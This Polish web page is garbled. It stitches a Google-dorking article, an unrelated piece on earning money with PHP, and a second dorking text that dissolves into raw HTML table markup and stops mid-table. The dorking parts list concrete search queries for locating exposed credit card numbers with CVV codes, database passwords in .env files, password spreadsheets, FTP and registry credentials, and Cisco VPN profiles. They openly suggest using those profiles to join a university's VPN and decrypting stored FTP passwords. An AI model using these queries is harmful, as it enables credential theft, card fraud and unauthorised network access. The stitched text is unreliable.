Inurl php http jakie zarobki. Jak zarabiać na znajomości PHP? Jak programista php może zarobić dobre pieniądze w domu?

Zdobycie prywatnych danych nie zawsze oznacza włamanie – czasami są one publikowane publicznie. Znajomość ustawień Google i odrobina pomysłowości pozwolą Ci znaleźć wiele ciekawych rzeczy – od numerów kart kredytowych po dokumenty FBI.

OSTRZEŻENIE

Wszystkie informacje podane są wyłącznie w celach informacyjnych. Ani redakcja, ani autor nie ponoszą odpowiedzialności za ewentualne szkody wyrządzone przez materiały zawarte w tym artykule.

Dziś wszystko jest podłączone do Internetu i nie ma potrzeby ograniczania dostępu. Dlatego wiele prywatnych danych staje się ofiarą wyszukiwarek. Roboty-pająki nie ograniczają się już do stron internetowych, ale indeksują wszystkie treści dostępne w Internecie i na bieżąco dodają do swoich baz danych informacje niepubliczne. Odkrycie tych tajemnic jest łatwe - wystarczy wiedzieć, jak o nie zapytać.

Szukam plików

W zdolnych rękach Google szybko znajdzie wszystko, czego nie ma w Internecie, na przykład dane osobowe i pliki do użytku służbowego. Często są ukryte jak klucz pod dywanikiem: nie ma tak naprawdę żadnych ograniczeń dostępu, dane po prostu leżą na odwrocie strony, dokąd nie prowadzą żadne linki. Standardowy interfejs sieciowy Google udostępnia jedynie podstawowe ustawienia wyszukiwania zaawansowanego, ale i one będą wystarczające.

Możesz ograniczyć wyszukiwanie w Google do określonego typu pliku, używając dwóch operatorów: filetype i ext . Pierwsza określa format, który wyszukiwarka ustaliła na podstawie tytułu pliku, druga określa rozszerzenie pliku, niezależnie od jego wewnętrznej zawartości. Podczas wyszukiwania w obu przypadkach wystarczy podać rozszerzenie. Początkowo operator ext był wygodny w użyciu w przypadkach, gdy plik nie miał określonej charakterystyki formatu (na przykład w celu wyszukiwania plików konfiguracyjnych ini i cfg, które mogły zawierać cokolwiek). Teraz algorytmy Google uległy zmianie i nie ma widocznej różnicy pomiędzy operatorami – w większości przypadków wyniki są takie same.


Filtrowanie wyników

Domyślnie Google wyszukuje słowa i ogólnie wszelkie wprowadzone znaki we wszystkich plikach na zaindeksowanych stronach. Możesz ograniczyć obszar wyszukiwania według domeny najwyższego poziomu, konkretnej witryny lub lokalizacji sekwencji wyszukiwania w samych plikach. W przypadku dwóch pierwszych opcji użyj operatora witryny, a następnie nazwy domeny lub wybranej witryny. W trzecim przypadku cały zestaw operatorów pozwala na wyszukiwanie informacji w polach usług i metadanych. Przykładowo allinurl znajdzie podany w treści samych linków, allinanchor - w tekście wyposażonym w tag , allintitle – w tytułach stron, allintext – w treści stron.

Dla każdego operatora dostępna jest uproszczona wersja z krótszą nazwą (bez przedrostka all). Różnica jest taka, że ​​allinurl znajdzie linki do wszystkich słów, a inurl tylko do pierwszego z nich. Drugie i kolejne słowa zapytania mogą pojawić się w dowolnym miejscu na stronach internetowych. Operator inurl różni się także od innego operatora o podobnym znaczeniu – site. Pierwsza pozwala także na znalezienie dowolnego ciągu znaków w łączu do przeszukiwanego dokumentu (np. /cgi-bin/), co jest powszechnie stosowane w celu znalezienia komponentów ze znanymi lukami w zabezpieczeniach.

Spróbujmy tego w praktyce. Bierzemy filtr allintext i sprawiamy, że żądanie generuje listę numerów i kodów weryfikacyjnych kart kredytowych, które wygasną dopiero za dwa lata (lub gdy ich właściciele znudzą się karmieniem wszystkich).

Allintext: data ważności numeru karty /2017 cvv

Kiedy czytasz w wiadomościach, że młody haker „włamał się na serwery” Pentagonu lub NASA, kradnąc tajne informacje, w większości przypadków mamy na myśli właśnie taką podstawową technikę korzystania z Google. Załóżmy, że interesuje nas lista pracowników NASA i ich dane kontaktowe. Z pewnością taka lista jest dostępna w formie elektronicznej. Dla wygody lub z powodu przeoczenia może on również znajdować się na stronie internetowej samej organizacji. Logiczne jest, że w tym przypadku nie będzie żadnych linków do niego, ponieważ jest on przeznaczony do użytku wewnętrznego. Jakie słowa mogą znajdować się w takim pliku? Co najmniej - pole „adres”. Testowanie wszystkich tych założeń jest łatwe.


Inurl:nasa.gov typ pliku:xlsx „adres”


Stosujemy biurokrację

Takie znaleziska są miłym akcentem. Naprawdę solidny chwyt zapewnia bardziej szczegółowa wiedza o operatorach Google dla webmasterów, samej sieci i osobliwościach struktury tego, czego szukasz. Znając szczegóły, możesz łatwo przefiltrować wyniki i udoskonalić właściwości niezbędnych plików, aby w pozostałej części uzyskać naprawdę wartościowe dane. Zabawne, że tu z pomocą przychodzi biurokracja. Tworzy standardowe formuły, wygodne do wyszukiwania tajnych informacji, które przypadkowo wyciekły do ​​Internetu.

Na przykład pieczęć z oświadczeniem o dystrybucji, wymagana przez Departament Obrony USA, oznacza ustandaryzowane ograniczenia dotyczące dystrybucji dokumentu. Litera A oznacza publikacje publiczne, w których nie ma nic tajnego; B – przeznaczony wyłącznie do użytku wewnętrznego, C – ściśle poufny i tak dalej, aż do F. Litera X wyróżnia się osobno, co oznacza informację szczególnie cenną, stanowiącą tajemnicę państwową najwyższego stopnia. Niech ci, którzy mają to robić na służbie, poszukają takich dokumentów, a my ograniczymy się do plików z literą C. Zgodnie z dyrektywą DoDI 5230.24 oznaczenie to przypisuje się dokumentom zawierającym opis technologii krytycznych objętych kontrolą eksportu . Tak starannie chronione informacje można znaleźć na stronach w domenie najwyższego poziomu.mil, przeznaczonej dla armii amerykańskiej.

„OŚWIADCZENIE O DYSTRYBUCJI C” inurl:navy.mil

Bardzo wygodne jest to, że domena .mil zawiera wyłącznie witryny Departamentu Obrony USA i jego organizacji kontraktowych. Wyniki wyszukiwania z ograniczeniem domeny są wyjątkowo przejrzyste, a tytuły mówią same za siebie. Wyszukiwanie w ten sposób rosyjskich tajemnic jest praktycznie bezużyteczne: w domenach.ru i.rf panuje chaos, a nazwy wielu systemów uzbrojenia brzmią jak botaniczne (PP „Kiparis”, działa samobieżne „Akatsia”) lub wręcz bajeczne ( Regulamin „Buratino”).


Uważnie studiując dowolny dokument z witryny w domenie .mil, możesz zobaczyć inne znaczniki, aby zawęzić wyszukiwanie. Na przykład odniesienie do ograniczeń eksportowych „Sec 2751”, co jest również wygodne przy wyszukiwaniu interesujących informacji technicznych. Od czasu do czasu jest usuwany z oficjalnych stron, na których się kiedyś pojawił, więc jeśli nie możesz skorzystać z interesującego linku w wynikach wyszukiwania, skorzystaj z pamięci podręcznej Google (operatora pamięci podręcznej) lub witryny Internet Archive.

Wspinaczka w chmury

Oprócz przypadkowo odtajnionych dokumentów rządowych w pamięci podręcznej Google czasami pojawiają się łącza do plików osobistych z Dropbox i innych usług przechowywania danych, które tworzą „prywatne” łącza do publicznie publikowanych danych. Jeszcze gorzej jest z usługami alternatywnymi i domowymi. Na przykład poniższe zapytanie pozwala znaleźć dane wszystkich klientów Verizon, którzy mają zainstalowany serwer FTP i aktywnie korzystają z routera.

Allinurl:ftp://verizon.net

Takich mądrych ludzi jest obecnie ponad czterdzieści tysięcy, a wiosną 2015 roku było ich znacznie więcej. Zamiast Verizon.net możesz zastąpić nazwę dowolnego znanego dostawcy, a im jest on bardziej znany, tym większy może być haczyk. Dzięki wbudowanemu serwerowi FTP możesz przeglądać pliki znajdujące się na zewnętrznym urządzeniu magazynującym podłączonym do routera. Zwykle jest to serwer NAS do pracy zdalnej, chmura osobista lub jakiś rodzaj pobierania plików peer-to-peer. Cała zawartość takich multimediów jest indeksowana przez Google i inne wyszukiwarki, dzięki czemu dostęp do plików przechowywanych na dyskach zewnętrznych można uzyskać poprzez bezpośredni link.

Patrząc na konfiguracje

Przed powszechną migracją do chmury proste serwery FTP rządziły jako zdalny magazyn, który również miał wiele luk w zabezpieczeniach. Wiele z nich jest nadal aktualnych. Na przykład popularny program WS_FTP Professional przechowuje dane konfiguracyjne, konta użytkowników i hasła w pliku ws_ftp.ini. Łatwo je znaleźć i odczytać, ponieważ wszystkie rekordy są zapisywane w formacie tekstowym, a hasła są szyfrowane algorytmem Triple DES po minimalnym zaciemnieniu. W większości wersji wystarczy po prostu odrzucić pierwszy bajt.

Takie hasła można łatwo odszyfrować za pomocą narzędzia WS_FTP Password Deszyfrator lub bezpłatnej usługi internetowej.

Mówiąc o włamaniu na dowolną stronę internetową, zwykle mają na myśli uzyskanie hasła z logów i kopii zapasowych plików konfiguracyjnych CMS-ów lub aplikacji e-commerce. Jeśli znasz ich typową strukturę, możesz łatwo wskazać słowa kluczowe. Linie takie jak te znajdujące się w pliku ws_ftp.ini są niezwykle powszechne. Przykładowo w Drupalu i PrestaShop zawsze znajduje się identyfikator użytkownika (UID) i odpowiadające mu hasło (pwd), a wszystkie informacje przechowywane są w plikach z rozszerzeniem .inc. Można je wyszukiwać w następujący sposób:

"pwd=" "UID=" wew:inc

Ujawnianie haseł DBMS

W plikach konfiguracyjnych serwerów SQL nazwy użytkowników i adresy e-mail są przechowywane w postaci zwykłego tekstu, a zamiast haseł zapisywane są ich skróty MD5. Ściśle mówiąc, nie da się ich odszyfrować, ale można znaleźć dopasowanie wśród znanych par hash-hasło.

Nadal istnieją systemy DBMS, które nawet nie używają mieszania haseł. Pliki konfiguracyjne dowolnego z nich można po prostu przeglądać w przeglądarce.

Intext:DB_PASSWORD typ pliku:env

Wraz z pojawieniem się serwerów Windows miejsce plików konfiguracyjnych częściowo zajął rejestr. Możesz przeszukiwać jego gałęzie dokładnie w ten sam sposób, używając reg jako typu pliku. Na przykład tak:

Typ pliku:reg HKEY_CURRENT_USER "Hasło"=

Nie zapominajmy o oczywistościach

Czasami do informacji niejawnych można dotrzeć przy użyciu danych, które zostały przypadkowo otwarte i na które zwróciła uwagę Google. Idealną opcją jest znalezienie listy haseł w jakimś popularnym formacie. Tylko zdesperowani ludzie mogą przechowywać informacje o koncie w pliku tekstowym, dokumencie Worda lub arkuszu kalkulacyjnym Excel, ale zawsze jest ich wystarczająco dużo.

Typ pliku:xls inurl:hasło

Z jednej strony istnieje wiele sposobów zapobiegania takim zdarzeniom. Należy określić odpowiednie prawa dostępu w htaccess, załatać CMS, nie używać leworęcznych skryptów i załatać inne dziury. Istnieje również plik z listą wyjątków w pliku robots.txt, który zabrania wyszukiwarkom indeksowania określonych w nim plików i katalogów. Z drugiej strony, jeśli struktura pliku robots.txt na jakimś serwerze różni się od standardowej, wówczas od razu staje się jasne, co próbują na nim ukryć.

Lista katalogów i plików w dowolnej witrynie jest poprzedzona standardowym indeksem. Ponieważ dla celów serwisowych musi pojawić się w tytule, warto ograniczyć wyszukiwanie do operatora intitle. Ciekawe rzeczy znajdują się w katalogach /admin/, /personal/, /etc/, a nawet /secret/.

Bądź na bieżąco z aktualizacjami

Trafność jest tutaj niezwykle ważna: stare luki w zabezpieczeniach są zamykane bardzo powoli, ale Google i jego wyniki wyszukiwania stale się zmieniają. Istnieje nawet różnica pomiędzy filtrem „ostatniej sekundy” (&tbs=qdr:s na końcu adresu URL żądania) a filtrem „czasu rzeczywistego” (&tbs=qdr:1).

Przedział czasowy ostatniej aktualizacji pliku jest również domyślnie wskazany przez Google. Za pomocą graficznego interfejsu internetowego możesz wybrać jeden ze standardowych okresów (godzina, dzień, tydzień itp.) lub ustawić zakres dat, ale ta metoda nie nadaje się do automatyzacji.

Z wyglądu paska adresu można się tylko domyślać, w jaki sposób można ograniczyć wyświetlanie wyników za pomocą konstrukcji &tbs=qdr:. Litera y po nim wyznacza limit jednego roku (&tbs=qdr:y), m pokazuje wyniki za ostatni miesiąc, w - za tydzień, d - za ostatni dzień, h - za ostatnią godzinę, n - na minutę i s - daj mi chwilę. Najnowsze wyniki, które właśnie udostępnił Google, można znaleźć za pomocą filtra &tbs=qdr:1 .

Jeśli potrzebujesz napisać sprytny skrypt, przyda się wiedza, że ​​zakres dat ustawia się w Google w formacie juliańskim za pomocą operatora daterange. Na przykład w ten sposób możesz znaleźć listę dokumentów PDF ze słowem poufne, pobranych w okresie od 1 stycznia do 1 lipca 2015 r.

Poufny typ pliku: pdf zakres dat: 2457024-2457205

Zakres jest podany w formacie daty juliańskiej bez uwzględnienia części ułamkowej. Ręczne tłumaczenie ich z kalendarza gregoriańskiego jest niewygodne. Łatwiej jest użyć konwertera dat.

Kierowanie i filtrowanie ponownie

Oprócz określenia w zapytaniu dodatkowych operatorów, można je przesłać bezpośrednio w treści linku. Na przykład specyfikacja filetype:pdf odpowiada konstrukcji as_filetype=pdf . Dzięki temu wygodnie jest poprosić o wyjaśnienia. Załóżmy, że wyjście wyników tylko z Republiki Hondurasu jest określone poprzez dodanie konstrukcji cr=countryHN do adresu URL wyszukiwania i tylko z miasta Bobrujsk - gcs=Bobruisk. Pełną listę znajdziesz w sekcji dla programistów.

Narzędzia Google do automatyzacji mają za zadanie ułatwiać życie, ale często powodują problemy. Na przykład miasto użytkownika jest określane na podstawie adresu IP użytkownika za pośrednictwem WHOIS. Na podstawie tych informacji Google nie tylko równoważy obciążenie pomiędzy serwerami, ale także zmienia wyniki wyszukiwania. W zależności od regionu, dla tego samego żądania na pierwszej stronie pojawią się różne wyniki, a niektóre z nich mogą być całkowicie ukryte. Dwuliterowy kod znajdujący się po dyrektywie gl=country pomoże Ci poczuć się jak kosmopolita i szukać informacji z dowolnego kraju. Na przykład kod Holandii to NL, ale Watykan i Korea Północna nie mają własnego kodu w Google.

Często wyniki wyszukiwania są zaśmiecone nawet po zastosowaniu kilku zaawansowanych filtrów. W takim przypadku łatwo jest doprecyzować żądanie, dodając do niego kilka słów wyjątków (przed każdym z nich umieszcza się znak minus). Na przykład bankowość, imiona i samouczki są często używane ze słowem Osobiste. Dlatego czystsze wyniki wyszukiwania pokaże nie podręcznikowy przykład zapytania, ale doprecyzowany:

Tytuł:"Indeks /Osobiste/" -imiona -tutorial -bankowość

Ostatni przykład

Wyrafinowany haker wyróżnia się tym, że we własnym zakresie zapewnia sobie wszystko, czego potrzebuje. Na przykład VPN jest wygodną rzeczą, ale albo kosztowną, albo tymczasową i z ograniczeniami. Zapisanie się na abonament dla siebie jest zbyt drogie. Dobrze, że są abonamenty grupowe, a przy pomocy Google łatwo jest zostać częścią grupy. Aby to zrobić, wystarczy znaleźć plik konfiguracyjny Cisco VPN, który ma dość niestandardowe rozszerzenie PCF i rozpoznawalną ścieżkę: Program Files\Cisco Systems\VPN Client\Profiles. Jedna prośba i dołączysz na przykład do przyjaznego zespołu Uniwersytetu w Bonn.

Typ pliku:pcf VPN LUB grupa

INFORMACJE

Google znajduje pliki konfiguracyjne haseł, ale wiele z nich jest zaszyfrowanych lub zastąpionych skrótami. Jeśli zobaczysz ciągi o stałej długości, natychmiast poszukaj usługi deszyfrowania.

Hasła są przechowywane w postaci zaszyfrowanej, ale Maurice Massard napisał już program do ich odszyfrowania i udostępnia go bezpłatnie za pośrednictwem thecampusgeeks.com.

Google przeprowadza setki różnych rodzajów ataków i testów penetracyjnych. Istnieje wiele opcji wpływających na popularne programy, główne formaty baz danych, liczne luki w zabezpieczeniach PHP, chmur i tak dalej. Dokładna wiedza, czego szukasz, znacznie ułatwi znalezienie potrzebnych informacji (zwłaszcza informacji, których nie zamierzałeś upubliczniać). Shodan nie jest jedynym, który karmi się ciekawymi pomysłami, ale każdą bazą danych zindeksowanych zasobów sieciowych!

Od autora: Cześć przyjaciele! W tym artykule porozmawiamy o języku programowania PHP. Dowiedzmy się do czego służy, co można z nim zrobić i jakie miejsce zajmuje na etapach tworzenia serwisu. Również w tym artykule przyjrzymy się wielu sposobom zarabiania pieniędzy, wiedząc, jak programować w PHP.

Co to jest PHP i do czego służy?

PHP to język skryptowy, który jest bardzo aktywnie wykorzystywany przy tworzeniu aplikacji internetowych. PHP to jeden z wiodących języków używanych przy tworzeniu dynamicznych stron internetowych.

PHP to język programowania po stronie serwera. Wszystkie skrypty napisane w tym języku są wykonywane na serwerze wraz z witryną. Aby uczyć się PHP, tworzyć i debugować strony internetowe oraz skrypty, oczywiście nie musisz kupować prawdziwego serwera w Internecie. Do tych celów wykorzystywane są emulatory serwerów, które w formie programów instaluje się po prostu na działającym komputerze. Natomiast na serwerze w Internecie (hostingu) umieszczane są gotowe strony internetowe i strony ze skryptami PHP. Nawiasem mówiąc, prawie każdy nowoczesny hosting obsługuje język PHP.

O popularności tego języka w dziedzinie tworzenia stron internetowych decyduje obecność dużego zestawu wbudowanych narzędzi do tworzenia aplikacji internetowych. Główne:

automatyczna ekstrakcja parametrów POST i GET oraz zmiennych środowiskowych serwera WWW do predefiniowanych tablic;

interakcja z dużą liczbą różnych systemów zarządzania bazami danych (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape i Apache Derby, Informix, Ovrimos SQL, Lotus Uwagi, DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird / InterBase, Paradox File Access, MaxDB, interfejs PDO);

automatyczne wysyłanie nagłówków HTTP;

praca z plikami cookie i sesjami;

praca z plikami lokalnymi i zdalnymi, gniazdami;

przetwarzanie plików przesłanych na serwer;

praca z XForms.

Spójrzmy na przykład, w którym na stronie działa skrypt PHP. Weźmy na przykład formularz subskrypcji, w którym w wielu witrynach podajesz swoje imię i nazwisko oraz adres e-mail. Za wygląd formularza odpowiadają HTML i CSS - kolory pól wejściowych i przycisków, zmiana koloru przycisku po najechaniu myszką i kliknięciu na nim itd. Za pomocą HTML5 możesz sprawdzić poprawność danych wprowadzonych do formularza - np. czy poprawnie wypełnione są pola e-mail lub telefon.

A po kliknięciu przycisku „Subskrybuj” wywoływany jest skrypt PHP, który odbiera dane, które wpisałeś w formularzu. Skrypt rejestruje je w bazie, generuje i wysyła link do potwierdzenia subskrypcji na podany w formularzu adres e-mail, sprawdza potwierdzenie subskrypcji i wysyła kolejne e-maile. Wszystkie te operacje wykonywane są na serwerze, a odbywa się to za pomocą języka programowania PHP.

Zastosowanie PHP w tworzeniu stron internetowych

Aby stworzyć stronę internetową, należy przejść przez kilka etapów:

Planowanie. Na tym etapie planujemy przyszłą witrynę: dla kogo i po co ją tworzymy, kto będzie ją odwiedzał, czym ją wypełnimy, co powinno się na niej znaleźć itd.

Projekt. Na etapie projektowania tworzymy wygląd stron serwisu w edytorze graficznym.

Układ. Na etapie układu za pomocą HTML i CSS tworzymy strony HTML przyszłej witryny z układów uzyskanych na etapie projektowania.

Programowanie. Na etapie programowania automatyzujemy procesy pracy z witryną. Programujemy część administracyjną serwisu (panel administracyjny) tak, abyś mógł dodawać, usuwać, edytować istniejące strony nawet dla osoby zupełnie nieobeznanej z budowaniem stron internetowych. Programujemy tak, aby wyszukiwarka i wszystkie formularze subskrypcji (jeśli występują) w serwisie działały. Dbamy o to, aby nowo dodana strona wyświetliła się w serwisie, a link do utworzonej strony automatycznie pojawił się w menu. Jeśli strona korzysta z głosowania lub ankiety, to również wszystko jest programowane w PHP, na etapie programowania.

Jeśli weźmiemy pod uwagę etap programowania większej witryny, np. sklepu internetowego, to wszystko tutaj jest jeszcze szersze i ciekawsze. W tym przypadku dodajemy nie tylko strony, ale także produkty – główną zawartość sklepu internetowego. Ponadto w panelu administracyjnym należy udostępnić podział dodanych produktów na różne kategorie. Powinna także istnieć możliwość edycji produktu, zmiany jego opisu, ceny, zdjęcia itp.

Dodatkowo sklep internetowy wymaga zaprogramowania systemu analitycznego - tak, aby w panelu administracyjnym można było zobaczyć, ile zamówień zostało złożonych i opłaconych, za jaką kwotę, za jakie produkty i z jakich kategorii zapłacono itp. Ponadto należy możliwość wyświetlania takich raportów za różne okresy. Programując sklep internetowy często wdraża się także raportowanie sprzedaży dla celów księgowo-podatkowych.

Dlatego etap, w którym wykorzystuje się język programowania PHP, jest najważniejszy, najdłuższy pod względem czasu, a także najdroższy i najlepiej opłacany w tworzeniu stron internetowych. A kiedy już zrozumiesz, jak zaprogramować sklep internetowy, będziesz mógł tworzyć skrypty dla strony internetowej o niemal dowolnej złożoności.

Popularność PHP

O popularności PHP świadczy fakt, że wykorzystuje go 83,1% wszystkich stron, na których udało się zidentyfikować język programowania po stronie serwera.

Wszystkie najpopularniejsze CMS-y zajmujące pierwsze miejsca w rankingach popularności (zarówno płatne, jak i bezpłatne: WordPress, Joomla, Drupal, Modx, Bitrix, Magento itp.) napisane są w języku programowania PHP.

O popularności języka programowania PHP świadczy także wiele stworzonych frameworków PHP, takich jak Laravel, Yii, CakePHP, Slim, Zend Framework 2, PHPixie, CodeIgniter, Symfony 2 i inne. Istnieje ogromna liczba forów i dużych społeczności - ogólnie dla PHP, dla każdego frameworka i dla każdego CMS-a z osobna.
Dodam też, że największe serwisy świata, np. Facebook, Wikipedia, też są pisane w PHP.

Jak zarabiać na znajomości PHP?

Biorąc pod uwagę popularność PHP, istnieje stałe duże zapotrzebowanie na programistów PHP. Znajomość PHP i umiejętność programowania w tym języku otworzy przed Tobą nowe możliwości zarabiania pieniędzy. Przyjrzyjmy się głównym, dzięki którym naprawdę możesz dziś zarobić pieniądze:

Zarabianie na tworzeniu skryptów. Wszystkie witryny stale się rozwijają i okresowo wymagają napisania nowych skryptów lub opracowania dodatkowych funkcjonalności, modułów itp. W przypadku takich zmian właściciele witryn zwracają się do programistów PHP. Co więcej, w tym przypadku możesz zarabiać pieniądze na dwa sposoby:

śledź zamówienia, aby znaleźć niezależnego programistę;

generować pomysły na masowe skrypty. Mając pomysł na skrypt, na który z pewnością będzie zapotrzebowanie np. wśród właścicieli sklepów internetowych, możesz samodzielnie opracować taki skrypt i sprzedać go właścicielom sklepów internetowych;

Finalizacja gotowych skryptów „na zamówienie”. Tutaj wszystko jest proste – bierzesz na siebie modyfikację lub korektę skryptu. Ale w tym przypadku jest pewien niuans – początkowo scenariusz może nie być wykonany zbyt dobrze, a jego dopracowanie może zająć więcej czasu niż pisanie scenariusza od zera. Dlatego jeśli korzystasz z tej metody zarabiania pieniędzy, początkowo bardzo uważnie przyjrzyj się temu, co będziesz modyfikował i uzupełniał.

Tworzenie wtyczek do systemów CMS. W tej metodzie wszystko przebiega tak samo, jak przy zarabianiu na skryptach. Często strony tworzone na gotowym CMS-ie wymagają napisania jakiegoś pluginu, dodatku czy rozszerzenia. A zarabiać tutaj możesz na dwa sposoby:

śledzenie zamówień na rozwój wtyczek, dodatków i rozszerzeń na zasadzie freelance;

opracuj i sprzedaj masową wtyczkę, na którą z pewnością będzie popyt w większości witryn;

Projekty własne i wspólne. Jeśli masz pomysł na projekt internetowy (startup), np. pomysł na przydatną usługę lub aplikację, która rozwiąże konkretny problem, możesz przystąpić do jego realizacji. Na początkowym etapie może to być nawet hobby, oprócz głównej pracy. Wtedy, gdy będzie już jasne, że hobby przerodzi się w duży projekt, będzie można poświęcić mu więcej czasu.

Tworzenie dynamicznych stron internetowych i silników dla nich. Możesz także zarabiać dobre pieniądze, tworząc niestandardowe strony internetowe, pracując jako freelancer lub w studiu internetowym.

Tworzenie stron internetowych dla siebie. Możesz stworzyć dla siebie stronę internetową, wypełnić ją przydatną treścią - a gdy witryna będzie miała wystarczającą liczbę odwiedzających, zacząć zarabiać umieszczając na niej płatne reklamy lub promując czyjeś produkty poprzez programy partnerskie.

Myślę, że wielu z Was pomyślało, że wszystkie powyższe metody zarabiania pieniędzy można połączyć. I to prawda! Możesz stworzyć dla siebie stronę internetową i pasywnie zarabiać sprzedając z niej reklamy, a dodatkowo stworzyć skrypt lub wtyczkę i sprzedawać ją na wyspecjalizowanych portalach, zarabiając na autopilocie od każdej sprzedaży, a jednocześnie nadal możesz pracować w sieci studio. Dlaczego nie? Oczywiście, że możesz!

Ile może zarobić programista PHP?

Przy zarobkach programistów PHP wszystko jest indywidualne. Wiele tutaj zależy od tego, gdzie pracować, jak pracować, jaki poziom wiedzy, jakie doświadczenie, kwalifikacje, jaką dodatkową wiedzę posiada programista i tak dalej. Dlatego w zasadzie nie może być tutaj żadnej dokładnej liczby. Możemy jednak sprawdzić, jakie zarobki są oferowane, gdy poszukujemy programistów PHP w studiu internetowym i ile są oni skłonni zapłacić za projekt na zewnętrznych giełdach.

Poniższy obrazek przedstawia proponowane wynagrodzenie programistów PHP w studiu internetowym. Ponadto jest to wynagrodzenie programistów PHP bez doświadczenia zawodowego:

Jeśli masz doświadczenie zawodowe, możesz zarobić znacznie więcej. Poniżej prezentujemy wynagrodzenia oferowane doświadczonym programistom PHP.

A dziś na freelancingu możesz także zarobić przyzwoite pieniądze:

Wniosek

PHP jest najpopularniejszym językiem programowania wśród twórców stron internetowych. Zdecydowana większość wszystkich stron internetowych w Internecie jest napisana w języku PHP. Mając wiedzę i możliwość rozwoju w tym języku programowania, można nieźle zarobić, a możliwości zarobku jest wiele – od pracy w studiu internetowym po rozwój własnego projektu lub startupu.

Każde poszukiwanie luk w zasobach sieciowych rozpoczyna się od rozpoznania i zebrania informacji.
Inteligencja może być aktywna – brutalna siła plików i katalogów witryny, uruchamianie skanerów podatności, ręczne przeglądanie witryny lub pasywna – wyszukiwanie informacji w różnych wyszukiwarkach. Czasami zdarza się, że luka zostaje ujawniona jeszcze przed otwarciem pierwszej strony witryny.

Jak to jest możliwe?
Roboty wyszukujące, nieustannie wędrujące po Internecie, oprócz informacji przydatnych przeciętnemu użytkownikowi, często rejestrują rzeczy, które mogą zostać wykorzystane przez atakujących do ataku na zasób sieciowy. Na przykład błędy skryptów i pliki z poufnymi informacjami (od plików konfiguracyjnych i dzienników po pliki z danymi uwierzytelniającymi i kopiami zapasowymi baz danych).
Z punktu widzenia robota wyszukującego komunikat o błędzie dotyczący wykonania zapytania sql ma postać zwykłego tekstu, nierozerwalnie związanego np. z opisem produktów na stronie. Jeśli nagle robot wyszukiwania natknie się na plik z rozszerzeniem .sql, który z jakiegoś powodu trafi do folderu roboczego witryny, wówczas zostanie on odebrany jako część zawartości witryny i również zostanie zaindeksowany (w tym ewentualnie hasła w nim określone).

Takie informacje można znaleźć, znając mocne, często unikalne słowa kluczowe, które pomagają oddzielić „strony podatne” od stron, które nie zawierają luk.
Ogromna baza danych specjalnych zapytań wykorzystujących słowa kluczowe (tzw. dorks) istnieje na exploit-db.com i jest znana jako baza danych Google Hack.

Dlaczego Google?
Dorks są kierowane głównie do Google z dwóch powodów:
− najbardziej elastyczna składnia słów kluczowych (pokazana w tabeli 1) i znaków specjalnych (pokazana w tabeli 2);
− indeks Google jest w dalszym ciągu pełniejszy niż indeks innych wyszukiwarek;

Tabela 1 – Główne słowa kluczowe Google

Słowo kluczowe
Oznaczający
Przykład
strona
Szukaj tylko w określonej witrynie. Bierze pod uwagę tylko adres URL
site:somesite.ru - znajdzie wszystkie strony w danej domenie i subdomenach
inurl
Szukaj według słów obecnych w uri. W odróżnieniu od kl. słowa „site”, wyszukuje dopasowania po nazwie witryny
inurl:news - znajduje wszystkie strony, na których dane słowo pojawia się w uri
w tekście
Szukaj w treści strony
intext:”korki” - całkowicie podobne do zwykłego zapytania o „korki”
tytuł
Wyszukaj w tytule strony. Tekst pomiędzy tagami <br></td> <td width="214">intitle:”index of” - znajdzie wszystkie strony z listami katalogów <br></td> </tr><tr><td width="214">wew <br></td> <td width="214">Wyszukaj strony z określonym rozszerzeniem <br></td> <td width="214">ext:pdf — wyszukuje wszystkie pliki PDF <br></td> </tr><tr><td width="214">Typ pliku <br></td> <td width="214">Obecnie całkowicie podobny do klasy. słowo „zewnętrzne” <br></td> <td width="214">typ pliku:pdf - podobny <br></td> </tr><tr><td width="214">powiązany <br></td> <td width="214">Wyszukaj witryny o podobnej tematyce <br></td> <td width="214">powiązane:google.ru - pokaże swoje analogi <br></td> </tr><tr><td width="214">połączyć <br></td> <td width="214">Wyszukaj witryny zawierające linki do tego <br></td> <td width="214">link:somesite.ru - znajdzie wszystkie witryny, które mają do tego link <br></td> </tr><tr><td width="214">definiować <br></td> <td width="214">Pokaż definicję słowa <br></td> <td width="214">zdefiniuj:0day - definicja terminu <br></td> </tr><tr><td width="214">Pamięć podręczna <br></td> <td width="214">Pokaż zawartość strony w pamięci podręcznej (jeśli jest) <br></td> <td width="214">cache:google.com — otworzy stronę z pamięci podręcznej <br></td> </tr></tbody></table><p>Tabela 2 – Znaki specjalne w zapytaniach Google <br></p><table><tbody><tr><td width="214"><b>Symbol</b><br></td> <td width="214"><b>Oznaczający</b><br></td> <td width="214"><b>Przykład</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Dokładna fraza <br></td> <td width="214">intitle:„Strona konfiguracji routera RouterOS” - wyszukaj routery <br></td> </tr><tr><td width="214">*<br></td> <td width="214">Dowolny tekst <br></td> <td width="214">inurl: „bitrix*mcart” — wyszukaj witryny na platformie Bitrix z podatnym na ataki modułem mcart <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Dowolna postać <br></td> <td width="214">Index.of - podobny do indeksu żądania <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Usuń słowo <br></td> <td width="214">error -warning - pokaż wszystkie strony zawierające błąd, ale bez ostrzeżenia <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Zakres <br></td> <td width="214">cve 2006..2016 - pokaż luki według roku, począwszy od 2006 <br></td> </tr><tr><td width="214">|<br></td> <td width="214">Logiczne „lub” <br></td> <td width="214">Linux | Windows - pokaż strony, na których pojawia się pierwsze lub drugie słowo <br></td> </tr></tbody></table><br>Warto zrozumieć, że każde zapytanie do wyszukiwarki jest wyszukiwaniem wyłącznie słownym. <br>Nie ma sensu szukać na stronie metaznaków (cudzysłów, nawiasów, znaków interpunkcyjnych itp.). Nawet wyszukiwanie dokładnej frazy podanej w cudzysłowie jest wyszukiwaniem słów, po którym następuje wyszukiwanie dokładnego dopasowania w wynikach. <p>Wszystkie dziwadła Google Hack Database są logicznie podzielone na 14 kategorii i przedstawiono je w tabeli 3. <br>Tabela 3 – Kategorie bazy danych Google Hack <br></p><table><tbody><tr><td width="168"><b>Kategoria</b><br></td> <td width="190"><b>Co pozwala znaleźć</b><br></td> <td width="284"><b>Przykład</b><br></td> </tr><tr><td 